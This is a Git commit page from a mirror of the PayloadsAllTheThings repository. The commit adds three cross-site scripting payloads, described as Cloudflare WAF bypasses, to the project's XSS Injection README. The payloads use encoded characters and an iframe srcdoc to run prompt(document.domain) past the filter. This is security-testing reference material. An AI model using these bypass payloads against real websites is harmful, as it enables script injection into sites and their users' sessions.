ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 10:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #72 from h1-ragnar/patch-1

Browse Source 
Cloudflare XSS Bypasses by Bohdan Korzhynskyi
This commit is contained in:
Swissky 2019-06-06 19:03:17 +02:00 committed by GitHub
commit 00f50c5f32
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
XSS Injection/README.md
View File

@ -876,6 +876,14 @@ Works for CSP like `script-src self`
## Common WAF Bypass
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
```html
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
```
### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
```